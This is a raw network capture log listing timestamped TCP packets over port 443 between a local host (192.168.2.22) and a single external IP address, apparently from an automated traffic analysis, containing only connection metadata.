Jan 26, 2021 21:25:20.692213058 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.692239046 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.692256927 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.692274094 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.692289114 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.692303896 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.692331076 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.692358971 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.693011999 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.693046093 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.693078995 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.693092108 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.693106890 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.693131924 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.693155050 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.693173885 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.693207026 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.693228006 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.693249941 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.693263054 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.693324089 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.693934917 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.693969965 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.694000006 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.694000006 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.694026947 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.694058895 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.694225073 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.694293976 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.696322918 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.715953112 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.716001034 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.716038942 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.716097116 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.716103077 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.716144085 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.716150045 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.716150999 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.716197014 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.716243982 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.716250896 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.716259003 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.716305971 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.716329098 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.716355085 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.716381073 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.716406107 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.716423035 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.716454983 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.716468096 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.716501951 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.716520071 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.716538906 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.716567993 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.716592073 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.716608047 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.716646910 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.716655016 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.716698885 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.716715097 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.716744900 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.716761112 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.716793060 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.716814995 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.716842890 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.716860056 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.716892004 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.716922998 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.716952085 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.716964960 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.717025042 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.717266083 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.718523979 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.718569040 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.718597889 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.718626976 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.718627930 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.718671083 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.718694925 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.718715906 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.718734026 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.718769073 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.718776941 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.718813896 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.718830109 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.718862057 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.718878984 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.718910933 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.718930960 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.718961954 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.718972921 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.719007969 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.719026089 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.719054937 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.719070911 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.719110012 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.719116926 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.719161034 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.719177961 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.719208956 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.719224930 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.719259024 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.719270945 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.719306946 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.719325066 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.719355106 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.719371080 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.719404936 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.719415903 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.719454050 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.719470024 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.719511986 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.719516993 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.719559908 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.719575882 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.719608068 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.719624043 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.719669104 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.719674110 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.719715118 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.719728947 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.719760895 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.719775915 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.719808102 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.719820023 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.719856977 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.719873905 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.719903946 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.719922066 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.719974041 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.720503092 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.720544100 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.720571041 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.720587015 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.720607042 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.720652103 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.720668077 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.720701933 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.720717907 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.720750093 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.720765114 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.720799923 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.720812082 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.720848083 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.720864058 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.720896959 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.720909119 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.720944881 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.720963001 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.721004963 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.721008062 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.721054077 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.721072912 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.721090078 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.721122980 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.721141100 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.721143007 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.721188068 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.721204042 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.721236944 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.721251011 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.721285105 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.721297979 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.721333981 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.721350908 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.721412897 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.721436024 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.721467972 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.721494913 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.721539974 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.721556902 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.721585989 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.721611023 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.721642017 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.721656084 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.721692085 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.721708059 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.721741915 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.721756935 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.721777916 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.721807003 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.721828938 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.721829891 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.721873045 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.721899033 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.721920967 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.721946001 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.721970081 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.721982956 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.722023010 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.722050905 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.722078085 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.722078085 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.722119093 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.722143888 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.722172022 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.722178936 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.722215891 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.722232103 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.722261906 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.722278118 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.722311974 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.722323895 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.722358942 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.722384930 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.722403049 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.722419024 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.722462893 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.722481012 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.722503901 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.722515106 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.722577095 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.722628117 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.722668886 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.722696066 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.722709894 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.722723961 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.722775936 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.722785950 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.722824097 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.722841978 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.722872972 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.722893953 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.722920895 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.722945929 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.722969055 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.722995996 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.723007917 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.723025084 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.723067045 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.723097086 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.723115921 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.723124981 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.723167896 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.723185062 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.723238945 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.723257065 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.723295927 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.723329067 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.723346949 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.723350048 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.723416090 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.723629951 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.723669052 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.723700047 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.723727942 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.723727942 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.723774910 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.723803043 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.723825932 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.723825932 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.723866940 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.723892927 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.723918915 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.723923922 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.723961115 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.723985910 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.724006891 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.724013090 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.724050999 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.724066973 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.724082947 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.724123001 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.724132061 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.724168062 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.724195957 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.724208117 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.724219084 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.724258900 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.724286079 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.724309921 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.724315882 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.724383116 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.724499941 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.724540949 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.724570990 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.724591970 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.724594116 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.724634886 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.724666119 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.724685907 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.724689007 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.724726915 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.724750996 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.724785089 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.724790096 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.724834919 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.724864006 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.724881887 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.724885941 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.724926949 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.724956036 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.724977970 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.724981070 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.725020885 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.725059032 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.725084066 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.725105047 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.725132942 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.725161076 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.725171089 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.725227118 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.725490093 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.725529909 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.725560904 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.725580931 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.725596905 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.725627899 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.725646973 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.725692987 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.739026070 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.743381023 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.743406057 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.743453026 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.743509054 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.744290113 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.744318962 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.744358063 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.744359970 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.744378090 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.744391918 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.744421959 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.744437933 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.744471073 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.744503975 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.744529963 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.744539976 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.744551897 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.744573116 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.744596004 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.744606018 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.744621038 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.744640112 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.744673014 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.744682074 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.744693041 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.744704962 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.744716883 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.744736910 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.744751930 CET	49165	443	192.168.2.22	172.67.150.228
